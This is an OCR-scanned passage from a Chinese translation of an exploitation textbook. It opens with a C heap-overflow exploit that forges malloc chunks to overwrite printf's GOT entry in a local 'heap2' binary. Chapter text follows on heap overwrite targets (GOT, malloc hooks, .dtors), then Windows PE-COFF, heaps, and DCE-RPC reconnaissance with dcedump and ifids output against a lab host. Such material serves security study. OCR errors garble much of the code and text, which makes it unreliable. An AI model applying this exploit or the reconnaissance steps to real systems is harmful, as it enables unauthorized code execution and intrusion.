0x40155620 <main_arena>: add %al, (%eax) 

. *snip* ... 
0x40155684 «main arena-100»: cmp $b1,0x96cc0804 (%ebx) 
*/ 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 


#define VULN "./heap2" 


O bin 是 堆 算法 中 的 一 个 术语 ， 一 般 用 于 存放 特定 大 小 的 空闲 堆 块 。 一 一 译 者 注 ， 
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#define XLEN 1040 /* 1024 + 16 */ 
#define ENVPTRZ 512 /* enough to hold our big layout */ 





/* mov %ecx,0x8(PRINTF_GOT) */ 

#define PRINTF GOT 0x08049648 ~ 8 

/* 13 and 21 work for Mandrake 9, glibc 2.2.5 - you may want to modify 
these until you point directly at 0x408 (or Oxfffffffc, for certain 
glibc's). Also, your address must be "clean" meaning not have lower bits 
Set. Oxf0 is clean, Oxfl is not. 

*/ 

#define CHUNK_ENV_ALLIGN 17 

#define CHUNK_ENV_OFFSET 1056-1024 


/* Handy environment loader */ 
unsigned int 
ptoa(char **envp, char *string, unsigned int total, size) 
{ 
char *p; 
unsigned int cnt; 
unsigned int size; 
unsigned int i; 


p = string; 


cnt = size = i = 0; 
for (cnt = 0; size < total_size; ent ++) 
{ 
envp[cnt] = (char *) malloc(strlen(p) + 1); 
envp[ent] = strdup(p); 
#ifdef DEBUG 
fprintf(stderr, "[*] strlen: %d\n", strlen(p) + 1); 
for (i-0; i < strlen(p) + 1; i ++) fprintf(stderr, "[*] %d:0x%.02x\n", 
#endif 


size += strlen(p) + 1; 
p += strlen(p) + 1; 
} 


return cnt; 


int 
main(int argc, char **argv) 
{ 
unsigned char *x; 
char *ownenv[ENVPTRZ]; 
unsigned int xlen; 
unsigned int i; 
unsigned char chunk[2048 + 1]; /* 2 times 1024 to have enough 
controlled mem to survive the orl */ 
unsigned char *exe[3]; 


i, 


pli] 
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unsigned int env_size; 
unsigned long retloc; 

unsigned long retval; 

unsigned int chunk_env_offset; 
unsigned int chunk_env_align; 


xlen = XLEN + (1024 - (XLEN - 1024)); 

chunk_env_offset = CHUNK_ENV_OFFSET; 

chunk_env_align = CHUNK_ENV_ALLIGN; 

exe[0] = VULN; 

exe[1] = x = malloc(xlen + 1); 

exe[2] = NULL; 

if (Ix) exit(-1); 

fprintf(stderr, “\n[*] Options: [ «environment chunk alignment» J [ 
<enviroment chunk offset» J]\n\n"); 

if (argv[1] && (argc == 2 || argc == 3)) chunk env align = atoi(argv[11); 

if (argv[2] && argc == 3) chunk env offset = atoi(argv[21); 

fprintf(stderr, "[*] using align $&d and offset %d\n", chunk, env align, 
chunk env offset); 

retloc = PRINTF GOT; /* printf GOT - 0x8 ... this is where ecx gets 
written to, ecx is a chunk ptr */ 

/*where we want to jump do, if glibc 2.2 - just anywhere on the stack 
is good for a demonstration */ 

retval-Oxbffffd40; 

fprintf(stderr, "[*] Using retloc: %p\n", retloc); 

memset (chunk, 0x00, sizeof(chunk)); 


for (i = 0; i « chunk env align; i ++) chunk[i] = 'X'; 
for (i = chunk env align; i <= sizeof(chunk) - (16 + 1); i += (16)) 
t 
*(long *)&chunk[i] = Oxfffffffc; 
*(long *)&chunk[i + 4] = (unsigned long)1032; /* S == chunksize(FD) 


breaking loop (size == 1024 + 8) */ 

/*retval is not used for 2.3 exploitation...*/ 

*(long *)&chunk[i + 8] = retval; 

*(long *)&chunk[i + 12] = retloc; /* printf GOT - 8..mov 
Secx, Ox8 (Seax) */ 


} 
#ifdef DEBUG 

for (i = 0; i < sizeof(chunk); i++) fprintf (stderr, "[*] $d: 
Ox®.02x\n", i, chunk[i]); 
#endif 


memset (x, Oxcc, xlen); 

*(long *)&x[XLEN - 16] Oxfffffffc; 

*(long *)&x[XLEN - 12] Oxfffffff0; 

/* we point both fd and bk to our fake chunk tag ... so whichever gets 
used is ok with us */ 

/*we subtract 1024 since our buffer is 1024 long and we need to have 
Space for writes after it... 

* you'll see when you trace through this. */ 


i 


it 
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*(long *)&x[XLEN - 8] = ((0xc0000000 - 4) - strlen(exe[0]) - 
chunk env offset-1024); 
*(long *)&x[XLEN - 4] - ((0xc0000000 - 4) - strlen(exe[0]) - 


chunk, env offset-1024); 

printf("Our fake chunk (Oxfffffffc) needs to be at $pWNn",((0xc0000000 
-4) - strlen(exe[0]) - chunk env offset)-1024); 

/*you could memcpy shellcode into x somewhere, and you would be able 
to jmp directly into it - otherwise it will just execute whatever is on 
the stack - most likely nothing good. (for glibc 2.2) */ 

/* clear our enviroment array */ 

for (i = 0; i « ENVPTRZ; i++) ownenv[i] = NULL; 

i - ptoa(ownenv, chunk, sizeof(chunk)); 

fprintf(stderr, "[*] Size of enviroment array: %d\n", i); 

fprintf(stderr, "[*] Calling: %s\n\n", exe[0]); 

if (execve(exe[0], (char **)exe, (char **)ownenv) ) 


{ 
fprintf(stderr, "Error executing s\n", exe[0]); 
free (x); 
exit (-1); 


} 


5.2.3 ”高 级 堆 洪 出 

当 利 用 复杂 的 堆 溢出 时 ，ltrace 是 最 好 的 工具 。 碰 到 比较 复杂 的 推 溢出 时 ， 必 须 经 历 几 个 重 
要 步骤 。 

(]) 使 堆 标准 化 。 这 是 指 如 果 进 程 生成 并 调用 execve， 那 么 就 简单 地 连接 到 这 个 进程 ， 如 果 
是 本 地 攻击 ， 将 用 execve () 启动 这 个 进程 。 重 要 的 是 要 了 解 堆 是 怎样 被 初始 化 的 。 

(2) 为 攻击 设置 堆 。 这 是 指 用 正确 的 大 小 和 顺序 ， 通 过 许多 无 意义 的 连接 调用 malloc 函 数 ， 
从 而 为 顺利 攻击 设置 相应 的 堆 。 

(3) 溢出 一 个 或 多 个 块 。 使 程序 通过 调用 一 个 malloc 函 数 〈 或 一 些 malloc 函 数 ) 改写 一 个 或 多 
个 字 。 接 着 使 这 个 程序 执行 你 改写 的 某 个 函数 指针 。 

认识 到 不 同 的 堆 溢 出 有 不 同 的 利用 方法 是 比较 重要 的 , 因为 对 于 堆 游 出 攻击 来 说 , 每 个 攻击 
都 有 唯一 对 应 的 环境 , 取决 于 程序 的 运行 状态 、 你 和 目标 程序 之 间 相关 联 的 行为 以 及 你 利用 的 具 
体 错误 等 。 不 要 等 到 攻击 之 后 才 考 虑 目标 程序 ， 在 触发 错误 前 ， 你 的 所 作 所 为 对 是 否 可 以 成 功 地 
攻击 目标 程序 以 及 攻击 代码 的 稳定 性 都 会 有 直接 的 影响 。 


改写 什么 
改写 什么 通常 应 遵循 以 下 3 个 原则 。 
(1) 改写 函数 指针 。 


(2) 改写 可 写 段 里 的 一 段 代码 。 

(3) 如 果 可 以 写 两 个 字 ,， 那么 可 以 先 写 一 点 代码 ,然后 改写 一 个 函数 指针 使 它 指向 这 个 代码 。 
另外 ， 可 以 用 改写 逻辑 变量 (如 is_logged_in) 的 方法 来 改变 程序 的 执行 流程 。 

e GOTA 





84 5% Æ X 出 
用 objdump-R 读 heap2 的 GOT 函 数 指针 : 
[dave@www FORFUN]$ objdump -R ./heap2 
./heap2: file format elf32-i386 


DYNAMIC RELOCATION RECORDS 


OFFSET TYPE VALUE 

08049654 R 386 GLOB DAT . gmon, start . 
08049640 R 386 JUMP SLOT malloc 

08049644 R 386 JUMP SLOT . libc start main 


08049648 R 386 JUMP SLOT printf 
0804964c R_386_JUMP_SLOT free 


08049650 R 386 JUMP SLOT strcpy 

e 全 局 函数 指针 

许多 库 函 数 ， 如 malloc.c， 需 依赖 全 局 函数 指针 来 维护 它们 的 调试 信息 、 记 录 信 息 或 一 些 
其 他 频繁 使 用 的 功能 。 在 改写 数据 后 ， 程 序 调用 _ free_hook、_malloc_hook 利 
_ realloc_hook 中 的 任何 一 个 ， 都 会 对 你 有 所 帮助 。 

@ DTORS 

.DTORS 是 gcc 在 函数 退出 时 使 用 的 析 构 函数 。 在 下 面 的 例子 里 ， 当 程序 通过 调用 exit 获 取 控 
制 时 ， 我 们 可 以 把 8049632c 作 为 函数 指针 。 


[dave@www FORFUN]$ objdump -j .dtors -s heap2 


heap2: file format elf32-i386 

.dtors 节 的 内 容 : 

8049628 £fffffff 00000000 a ee ee ee 

€ atexit 处 理 程序 

在 没有 exit_funcs 的 系统 上 查找 atexit 处 理 程序 ， 需 要 查阅 前 面 的 注解 。 这 也 将 导致 程序 
退出 。 

e 栈 值 

对 于 本 地 可 执行 文件 来 说 ， 栈 上 保存 的 返回 地 址 通常 可 以 预测 。 然 而 ， 在 远程 攻击 时 ， 你 不 
能 预测 或 控制 远程 机 器 上 的 环境 变量 ， 因 此 ， 这 并 不 是 最 佳 选择 。 


5.3 ”小结 


因为 大 部 分 堆 溢 出 都 是 通过 破坏 malloc O 的 数据 结构 来 获取 控制 的 ， 因 此 有 人 针对 各 种 
malloc() 实现 ， 在 保护 性 标志 的 领域 里 做 了 一 些 工作 。 在 理论 上 ， 这 些 工 作 和 栈 保护 性 标志 十 
分 类 似 ， 但 是 ， 绝 大 多 数 的 malloc () 实现 还 没有 采用 这 些 保护 措施 〈 例 如， 在 我 们 写 这 本 书 的 
时 候 只 有 FreeBSD 对 堆 操作 进行 简单 的 安全 性 检查 )。 即 使 堆 保护 性 标志 普及 了 ,操纵 malloc () 
实现 再 也 不 会 导致 堆 溢 出 了 ， 但 可 以 预见 的 是 ， 程 序 仍 会 受到 其 他 类 型 堆 溢 出 的 攻击 。 
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一面 介绍 了 Linux， 此 后 介绍 的 其 他 各 种 操作 系统 都 会 拿 来 与 Linux 做 比较 。 本 章 主要 让 

A I 经 验 丰富 的 Windows 黑 客 重 温 一 下 Microsoft 问 题 ， 同 时 使 UNIX 黑 客 对 Windows 内 幕 有 
较 好 的 理解 。 结 束 本 章 学 习 后 ， 你 应 该 可 以 独立 编写 简单 的 Windows 利 用 程序 ， 并 在 尝试 一 些 复 
杂 的 破解 时 ， 避 免 出 现 常见 的 错误 。 

在 本 章 ， 你 还 可 以 学 习 怎样 使 用 常见 的 Windows 调 试 工具 ， 并 由 此 进一步 学 习 Windows 安 
全 、 编程 模型 、 DCOM (Distributed Component Object Model, 分 布 式 组 件 对 象 模 型 ) 和 PECOFF 
(Portable Executable-Common File Format， 可 移植 的 公共 可 执行 文件 格式 ) 等 基础 知识 。 简 
而 言 之 ， 本 章 包含 的 内 容 是 有 多 年 经 验 的 老 黑 客 在 准备 攻击 Windows 平 台 时 也 会 喜欢 了 解 的 
内 容 。 


6.1 Windows 和 Linux 有 何不 同 


NT 项 目 组 活跃 于 1989 年 ， 在 1991 年 首次 发 行 了 Windows NT 3.1。 在 设计 之 初 ，Windows NT 
开发 团队 的 设计 理念 受到 已 有 的 各 种 体系 结构 的 影响 。 比 如 说 , 虽然 VMS 与 NT 之 间 有 本 质 区 别 ， 
但 不 可 否认 的 是 ，NT 最 初 的 大 部 分 内 部 实现 都 深 受 VMS 的 启发 。 值 得 注意 的 是 ，NT 的 早期 版 本 
就 引入 了 内 核 线程 概念 。 本 章 将 介绍 Linux 或 UNIX 用 户 不 太 熟 悉 的 NT 的 主要 特性 。 


Win32 API 和 PE-COFF 

OlyDbg 是 一 个 多 功能 、 汇 编 级 的 Windows 分 析 调 试 器 〈 见 图 6-1)， 特 别 适 用 于 分 析 二 进 制 
文件 。 在 学 习 过 程 中 使 用 二 进 制 分 析 调 试 器 〈 如 OllyDbg) 将 有 助 于 更 好 地 理解 所 学 的 内 容 。 为 
了 运用 在 这 里 学 到 的 知识 ， 你 需要 一 个 这 样 的 工具 。OllyDbg 是 共享 软件 ， 可 以 从 
http://www.ollydbg.de/ 下 载 最 新 版 本 。Windows 的 API 是 32 位 的 ，Linux 的 程序 员 可 以 把 Windows API 
想象 为 /usr/1ib 里 所 有 的 共享 库 的 集合 。 





注解 如 果 你 对 Windows API 了 解 其 少 或 一 点 都 不 知道 ， 建 议 你 读 一 下 Brook Miles 所 写 的 精彩 在 
线 教程 ( www.winprog.org/tutorial/ )。 


cna ronan oti ie enone ana LU AON MEL TCE NESS EN NHN 


在 Linux 上 ， 有 经 验 的 程序 员 使 用 open () 或 write() 之 类 的 系统 调用 ， 就 可 以 编写 出 直接 和 
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内 核 交 互 的 程序 。 但 在 Windows 上 就 没 这 么 幸运 了 。Windows NT 的 每 个 新 服务 包 和 发 行 版 都 会 改 
变 其 内 核 接口 , 为 了 使 原来 的 程序 可 以 继续 工作 , 微软 公司 在 提供 服务 包 和 发 行 版 的 同时 会 包括 
相应 的 函数 库 [通称 为 DLL (Dynamic Link Library， 动 态 链接 库 )]。DLL 为 进程 调用 那些 不 属于 
自己 可 执行 代码 里 的 函数 提供 了 途径 。 这 类 函数 的 可 执行 代码 保存 在 单独 的 DLL 里 ， 与 使 用 它们 
的 程序 分 开 保 存 ， 一 个 DLL 可 以 包含 一 个 或 多 个 被 编译 、 链 接 的 函数 。Windows API 其 实 就 是 一 
个 有 序 的 DLL 集合 ， 因 此 ， 使 用 Win32 API 的 进程 其 实 都 是 在 使 用 动态 链接 。 


< OllyDbg - cmd.exe BEE 


rs 
E Text strings referenced in ntdii text xd 
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图 6-1 OllyDbg 可 以 显示 载 入 内 存 的 DLL 的 所 有 信息 


这 些 特性 给 Windows 内 核 项 目 组 带 来 了 很 多 便利 ， 因 为 这 样 一 来 ， 即 使 他 们 修改 内 部 的 API 
或 增加 一 些 复 杂 的 新 功能 ， 也 不 会 影响 程序 员 正 常 使 用 API。 与 此 相反 , 在 各 种 版 本 的 UNIX 平 台 
里 ， 只 要 大 多 数 的 程序 员 没 有 违规 调用 ， 你 就 不 能 擅自 为 系统 调用 增加 新 的 参数 。 

和 其 他 现代 操作 系统 一 样 ，Windows 也 使 用 可 重 定位 的 文件 格式 ， 使 程序 在 运行 时 可 以 动态 
加 载 ， 从 而 提供 共享 函数 库 。Linux 里 的 共享 函数 库 是 以 .sc 文件 的 形式 出 现 的 ， 在 Windows 里 是 
DLL。 和 ELF 文 件 格式 的 .so 类 似 ，DLL 是 PE-COFF 文 件 格式 [也 称 为 PE (portable executable) ]. 
PE-COFF 源 自 UNIX COFF 格 式 ， 是 一 种 可 移植 的 文件 格式 ， 因 为 它们 可 以 加 载 到 所 有 的 32 位 
Windows 平 台 上 。PE 加 载 器 接受 这 种 文件 格式 。 

PE 文件 的 开始 部 分 包括 导入 表 和 导出 表 ， 导 入 表 指示 PE 文件 需要 用 到 哪些 (DLL) 文件 ， 
以 及 用 到 这 些 文件 中 的 哪些 函数 。 导 出 表 则 指示 此 DLL 可 以 提供 哪些 函数 ， 也 指明 这 些 函 数 在 
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DELL 文件 中 的 地 址 。DLL 被 载 入 内 存 后 ， 程 序 可 以 根据 这 些 地 址 找到 需要 的 函数 。 导 入 表 列 出 PE 
文件 要 用 到 的 、 但 在 DLL 里 的 函数 ， 也 会 列 出 这 些 函数 所 在 的 DLL 的 文件 名 。 

大 多 数 PE 文件 是 可 重 定位 的 。 和 ELF 文 件 类 似 ，PE 文 件 由 各 种 区 段 组 成 ， 其 中 的 .reloc 区 
段 用 于 在 内 存 里 重 定位 DLL。 使 用 .reloc 的 目的 是 允许 程序 加 载 编译 时 使 用 相同 内 存 空 间 的 两 
个 DLL。 

和 UNIX 不 太一 样 的 是 ，Windows 首 先 会 在 当前 工作 目录 下 搜索 DLL， 然 后 再 在 其 他 地 方 
搜索 。 从 黑客 的 角度 来 看 ， 这 为 他 们 提供 了 脱离 Citrix 或 终端 服务 限制 的 机 会 。 但 是 从 开发 者 
的 角度 来 看 , 这 将 允许 开发 者 发 布 不 同 于 系统 根 目录 C\winnt\system32) 里 的 DLL。 当 然 ， 
这 在 一 定 程度 上 会 造成 版 本 混乱 ， 有 时 把 这 种 问题 称 为 DLL-hell。 遇 到 DLL-hell 问 题 的 用 户 在 
加 载 不 完整 的 程序 时 , 为 了 避免 不 同 版 本 DLL 之 间 的 冲突 , 只 能 调整 PATH 环 境 变量 或 者 把 DLL 
挪 来 挪 去 。 

学 习 PE-COFF， 首 先 要 理解 RVA (Relative Virtual Address， 相 对 虚拟 地 址 )。RVA 用 于 减少 
PE 加 载 器 的 工作 量 , 通过 使 用 RVA， 函 数 可 以 被 重 定位 在 虚拟 地 址 空间 的 任何 地 方 ， 如 果 不 使 用 
RVA，PE 加 载 器 将 需要 确认 每 个 可 重 定位 的 条 目 ， 从 而 浪费 大 量 的 系统 资源 。 在 学 习 Win32 的 过 
程 中 ， 你 可 能 已 经 注意 到 ， 微 软 公 司 喜 欢 使 用 简称 DRVA. AV (Access Violation， 访 问 违 例 )、 
AD (Active Directory， 活 动 目录 ) 等 ]， 而 不 是 像 UNIX 那 样 使 用 术语 的 省 略 形式 (tmp, ete, vi, 
segfault)。 令 人 头痛 的 是 ， 微 软 公 司 每 次 发 布 新 文档 时 ， 总 会 引入 几 千 个 术语 和 相关 的 简称 。 





注解 关于 阴谋 家 的 有 趣 论调 : 在 微软 公司 园区 近 党 有 一 尽 非 常 显眼 的 科学 论 派 大 楼 ， 但 好 像 
从 来 都 没有 人 进出 过 。 


RVA 实 际 包 含 的 意思 是 :“ 各 个 DLL 载 入 内 存 空 间 时 ， 系 统 会 为 其 分 配 一 个 基 址 ， 根 据 基 址 
加 上 RVA 的 结果 就 可 以 找到 需要 的 数据 (函数 )。” 以 msvert.d11 的 malloc() 函数 为 例 ， 
msvcrt.d11 的 文件 头 中 包括 了 msvcrt.d1l 提 供 的 函数 表 〈 导 出 表 )。 这 个 导出 表 中 包含 函数 
malloc 和 RVA〔 例 如 ，2000)。 系 统 把 msvcrt .dll 载 入 内 存 时 ， 会 为 其 指定 基 址 ， 在 这 里 假定 
它 是 0x80000000， 这 样 一 来 ， 就 可 以 通过 0x80002000〔 基 址 加 上 RVA) 找到 malloc 函 数 了 。 在 
默认 情况 下 ，Windows NT 加 载 .ExE 的 基 址 是 0x40000000。 当 然 ， 根 据 语言 包 或 编译 器 的 选项 不 
同 这 个 基 址 会 有 于 改变， 但 一 般 都 是 0x40000000。 

微软 公司 通常 会 单独 发 布 PE-COFF 符 号 文件 。 可 以 从 微软 公司 的 MSDN 站 点 下 载 各 版 本 操作 
系统 的 符号 包 ， 或 者 通过 WinDbg 使 用 他 们 提供 的 远程 符号 服务 器 。 但 遗憾 的 是 ，OllyDbg 目 前 还 
不 支持 微软 的 远程 符号 服务 器 。 

要 了 解 PE-COFF 的 更 多 内 容 ， 请 在 微软 公司 网 站 上 搜索 PE-COFF 。 最 后 ， 请 大 家 记 住 ， 
Windows NT 和 UNIX 不 太一 样 ， 它 不 允许 用 户 删 除 使 用 中 的 文件 。 


6.2 te 
DLL 被 加 载 时 会 调用 初始 化 函数 。 初 始 化 函数 通常 又 会 调用 Heapcreate() 来 设置 属于 自己 
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的 堆 ， 并 把 指向 挫 的 指针 保存 为 全 局 变量 ， 因 此 ， 在 以 后 的 雄 分 配 操作 过 程 中 ， 可 以 用 它 代 替 默 
认 堆 。 大 多 数 的 DLL 在 内 存 里 都 拥有 一 个 .data 区 段 ， 用 于 保存 全 局 变量 ， 在 这 片 内 存 里 ， 你 可 
以 发 现 一 些 有 用 的 函数 指针 或 数据 结构 。 程 序 在 运行 过 程 中 ， 可 能 会 加 载 多 个 DLL， 从 而 导致 内 
存 空间 里 存在 许多 堆 。 因 为 有 如 此 多 的 堆 ， 堆 恶化 攻击 可 能 会 导致 系统 异常 混乱 。 在 Linux 里 ， 
可 能 只 是 一 个 堆 受 到 破坏 ,但 在 Windows 里 却 可 能 是 几 个 堆 立即 被 破坏 ， 这 将 使 我 们 的 分 析 变 得 
更 加 复杂 。 当 用 户 在 Win32 里 调用 malloc () 时 ， 他 实际 上 用 的 是 msvcrt.dl11 导 出 的 函数 ， 这 个 
函数 再 调用 Heapvalidaate () 来 分 配 msvcrt .dl11 的 私有 堆 。 你 可 能 会 被 Heapvaliaate() 函数 所 
吸引 而 用 它 来 分 析 堆 恶化 的 情形 ， 但 这 个 函数 实际 上 不 起 什么 作用 。 

当 破 解 堆 溢出 后 再 使 用 shellcode 调 用 Win32 API 函 数 时 通常 会 引起 混乱 ， 在 RtlHeapFree () 
或 RtlHeapAllocate() 里 面 ， 有 些 函 数 工 作 正 常 ， 而 有 些 可 能 会 引起 访问 违例 ， 访问 违 例会 
在 你 获得 控制 权 之 前 终止 进程 winExec () 和 类 似 的 函数 就 是 因为 无 法 与 被 破坏 的 堆 共事 而 声 


名 狼藉 。 
每 个 进程 在 创建 之 初 都 有 一 个 默认 堆 ， RiT ] 可 以 用 GetDefaultHeap () 找到 这 个 默认 堆 ， , 
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着 攻击 者 几乎 只 能 用 返回 tibc 的 方法 《尽管 有 可 能 使 用 任何 DLL， 而 不 仅仅 是 libe 或 类 似 的 东西 ) 
来 获取 执行 控制 。 


6.3 DCOM、DCE-RPC 的 优 缺 点 


DCOM、DCE-RPC、NT 的 线程 和 进程 体系 结构 、NT 的 鉴别 令 牌 都 是 互相 关联 的 。 一 开始 就 
全 面 了 解 COM 的 基本 原理 ， 有 助 于 我 们 理解 COM 与 UNIX 中 对 应 组 件 的 异同 。 

微软 公司 为 了 经 济 效益 而 发 布 二 进 制 软 件 包 ,并 建立 相应 的 系统 支持 它 。 因 此 ， 微 软 公 司 开 
发 的 所 有 软件 都 支持 DCOM。 从 第 三 方 购买 COM 模 块 ， 把 它们 放 在 目录 里 ， 然 后 用 Visual Basic 
组 装 它 们 ， 就 完全 可 以 创建 相当 复杂 的 应 用 程序 。 

我 们 可 以 用 支持 COM 的 语言 编写 COM 对 象 ， 并 实现 这 些 对 象 间 顺 畅 交 互 。COM 的 大 部 分 特 
性 都 是 由 所 使 用 的 语言 决定 的 。 例 如 ， 对 C++ 来 说 是 一 个 整数 ， 对 Visual Basic 而 言 却 未 必 如 此 。 

为 了 深入 理解 COM， 你 应 该 查阅 常见 的 IDL (Interface Description Language， 接 口 描述 语言 ) 
文件 。 我 们 在 后 文中 将 使 用 DCOM IDL 文 件 。 


uuid(e33c0cc4-0482-101a-bc0c-02608c6ba218), 
version(1.0), 
implicit handle(handle t rpc binding) 


interface ??? 


typedef struct ( 
TYPE 2 element 1; 
TYPE 3 element 2; 
} TYPE 1; 


Short Function 00( 
[in] long element 9, 
fin] [unique] [string] wchar t *element 10, 
Tin] [unique] TYPE 1 *element 11, 
[in] [unique] TYPE 1 *element 12, 
[in] [unique] TYPE 2 *element 13, 
[in] long element 14, 
[in] long element 15, 
[out] [context handle] void *element 16 

): 

我 们 在 这 里 定义 的 DL 和 C++ 中 类 的 头 文件 类 似 。 打 个 比方 说 ， 这 些 只 是 由 UUID 定 义 的 特殊 
接口 里 的 特殊 函数 的 参数 《和 返回 值 )。 必 须 是 唯一 的 任何 东西 (所 有 的 名 字 〉 在 COM 里 都 是 一 
个 cuID。 通 常 假设 这 个 128 位 数 是 全 局 唯一 的 ， 也 就 是 说 ， 只 能 有 一 个 。 因 此 ， 每 次 引用 一 个 独 
特 的 0UID， 都 是 指 某 个 确切 的 接口 。 

COM 对 象 的 接口 描述 可 能 非常 复杂 。 对 于 支持 COM 的 ) 语言 编译 器 来 说 ， 假 设 它 生成 一 
段 代 码 ， 把 JDL 规 范 描述 转换 成 这 个 语言 需要 它 呈 现 的 格式 ， 可 以 是 字符 、 数 组 、 用 数组 存储 的 
指针 、 包 含 其 他 数组 的 结构 ， 等 等 。 
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实际 上 ， 可 以 选择 多 种 捷径 来 维护 可 接受 的 速度 。 比 如 用 little-endian 序 表示 ， 长 整数 将 是 32 
位 的 ， 把 它 从 C++ 表示 转换 成 由 C++ COM 对 象 表示 就 很 简单 了 。 

调用 COM 对 和 象 有 两 种 方法 : 直接 把 它 作为 DLL 载 入 进程 空间 ， 或 者 把 它 作为 服务 运行 [ 通 
过 Service Control Manager 〈 以 SYSsTEM 权 限 运 行 的 特殊 进程 )]。 在 其 他 进程 里 运行 COM 服 务 ， 虽 
然 慢 了 一 点 ， 但 可 以 保证 进程 更 稳定 、 更 安全 。 进 程 内 调用 不 用 转换 数据 类 型 ， 比 调用 在 同一 机 
器 但 不 在 同一 进程 里 的 COM 接 口 要 快 上 1000 倍 ; 而 调用 同一 机 器 上 的 接口 ， 又 比 调用 同一 网 络 
里 的 接口 要 快 上 至 少 10 倍 。 

对 Windows 来 说 ， 比 较 重要 的 事情 是 程序 员 只 要 在 程序 里 改变 注册 方式 或 更 改 一 个 参数 ， 程 
序 就 能 用 不 同 的 进程 或 不 同 的 机 器 进行 相同 的 调用 。 

例如 ， 查 看 NT 上 的 AT 服 务 。 如 果 你 准备 写 一 个 与 AT 交 互 的 程序 并 用 它 来 安排 命令 ， 那 么 ， 
你 可 以 查阅 ar 服务 的 接口 定义 , 把 DCOM 调 用 绑 到 一 个 接口 上 , 然后 调用 这 个 接口 上 的 具体 过 程 。 
当然 ， 在 你 的 进程 和 Ar 服务 进程 之 间 发 送 数据 前 ， 最 好 先 找到 相应 的 IDL 文 件 ， 了 解 怎样 转换 参 
数 。 即 使 这 个 进程 运行 在 其 他 计算 机 上 ， 也 完全 可 以 用 同样 的 过 程 进 行 。 假 如 那样 的 话 ， 你 的 
DCOM 函 数 库 可 以 连 到 远程 计算 机 端点 映射 程序 CTCP 111355. 并 询问 ar 服务 监听 哪个 端口 。 
端点 映射 程序 ( 它 本 身 也 是 一 个 DCOM 服 务 ， 总 是 绑 定 在 已 知 的 端口 上 ) 将 响应 “ar 服务 正在 监 
听 如 下 的 命名 管道 RPC 服 务 ， 你 可 以 连接 到 445 或 139 端 口 。 对 DCE-RPC 调 用 来 说 ， 它 也 正在 监 
昕 TCP 端 口 1025 和 UDP 端 口 1034”。 而 这 些 对 开发 者 而 言 都 是 透明 的 。 

你 现在 应 该 知道 DCE-RPC 和 DCOM 的 优点 所 在 了 。 你 可 以 出 售 二 进 制 形式 的 DCOM 包 ,或 
者 提供 一 台 可 以 通过 网 络 访问 的 、 装 有 DCOM 接 口 的 机 器 ， 使 开发 者 用 Visual Basic、C++ 或 其 他 
支持 DCOM 的 语言 远程 连接 它们 。 如 果 要 追求 更 高 的 速度 ， 你 可 以 直接 把 DCOM 的 接口 作为 DLL 
载 入 客户 端 进 程 。 这 个 范式 几乎 是 区 别 Windows NT 与 其 他 服务 器 平台 的 最 根本 特征 。“ 腾 客户 
端 和 “远程 可 管理 性 ”和 “快速 应 用 开发 ”都 指向 同一 个 东西 一 -DCOM。 

然而 ， 这 些 特 点 恰恰 也 是 DCE-RPC 和 DCOM 的 缺点 所 在 。 一 个 人 的 远程 可 管理 性 对 其 他 人 
而 言 很 可 能 就 是 远程 漏洞 。 作 为 黑客 ， 你 的 目标 就 是 要 做 到 比 系统 管理 员 更 加 了 解 他 们 的 系统 。 
因为 DCOM 与 所 有 的 系统 安全 基本 原理 一 样 ， 很 复杂 也 很 难 理解 ， 所 以 要 做 到 比 系统 管理 员 更 了 
解 他 们 的 系统 并 不 是 太 难 。 

下 一 节 将 介绍 一 些 利用 DCE-RPC 和 DCOM 的 基础 知识 。 


6.3.1 侦察 


有 两 个 工具 可 用 于 侦察 远程 的 DCE-RPC: Dave Aitel 的 SPIKE Cwww.immunitysec.com/) 和 
Todd Sabin 的 DCE-RPC 工 具 包 (http:/www.bindview.com/Services/razor/Utilities/)。 

在 这 个 例子 里 ， 我 们 用 SPIKE 里 的 dcedump 程 序 远程 观察 用 端点 映射 程序 注册 的 DCE-RPC 服 
务 ( 也 称 为 DCOM 接 口 )。 这 和 在 UNIX 里 运行 pcdump-p 的 效果 差不多 。 

[dave@localhost dcedump]$ ./dcedump 192.168.1.108 | head -20 

DCE-RPC tester. 


TepConnected 
Entrynum=0 
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annotation= 
uuid=4f£82£460-0e21-licf-909e-00805f48a135 , version=4 
Executable on NT: inetinfo.exe 

neacn_np: \\WIN2KSRV[\PIPE\NNTPSVC] 

Entrynum=1 
annotation= 
uuid=906b0ce0-c70b-1067-b317-Q0dd010662da , version=1 
Executable on NT: msdtc.exe 
ncalrpc[LRPCO00001f£4.00000001] 

Entrynum-2 





annotation- 
uuid-s906b0ce0-c70b-1067-5317-00dd010662da , version-1 
Executable on NT: msdtc.exe 

ncacn ip tcp:192.168.1.108[1025] 


可 见 ， 在 这 里 ,我 们 有 3 个 不 同 的 接口 ， 可 以 用 3 种 不 同 的 方法 与 它们 建立 连接 。 我 们 可 以 用 
SPIKE 的 接口 ids (ifids)〉 程 序 进一步 查看 端点 映射 程序 提供 的 接口 。 当 然 ， 也 可 以 用 它 检 查 几 平 
所 有 激活 的 TCP 接 口 (msdtc .exe 例 外 )。 


[dave@localhost dcedump]$ ./ifids 192.168.1.108 135 

DCE-RPC IFIDS by Dave Aitel. 

Finds all the interfaces and versions listening on that TCP port 
Tep Connected 

Found 11 entries 
elaf8308-5d1f-11c9-91a4-08002b14a0fa v3. 
0b0a6584-9e0f-11cf-a3cf-00805f68cblb v1. 
975201b0-59ca-11d0-a8d5-00a0c90d8051 vi. 
e60c73e6-88f£9-11cf-9af1-0020af6e72f4 v2. 
99fcfec4-5260-101b-bbcb-00aa0021347a vO. 
b9e79e60-3d52-11ce-aaa1-00006901293f v0. 
412f241e-c12a-l1ce-abff-0020af6e7a17 v0. 
00000136-0000-0000-c000-000000000046 v0. 
c6£3ee72-ce7e-11d1-b71e-00c04fc3111a v1. 
4d9f4ab8-7dlc-ilcf-861e-0020af6e7c57 v0. 
000001a0-0000-0000-c000-000000000046 v0. 
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Done 

现在 ， 为 了 在 端点 映射 程序 或 在 其 他 TCP 服 务 里 寻找 溢出 ， 可 以 直接 把 这 些 内 容 交 给 SPIKE 
的 msrpcfuzz 程序 。 如 果 你 有 这 些 服务 的 IDL [可 以 从 一 些 开源 项 目 〈 如 Snort〉 中 找到 一 部 分 ]， 
可 以 用 它 指导 函数 分 析 。 否 则 ， 你 就 只 能 进行 自动 或 手动 的 二 进 制 分 析 了 。Matt Chapman 写 的 
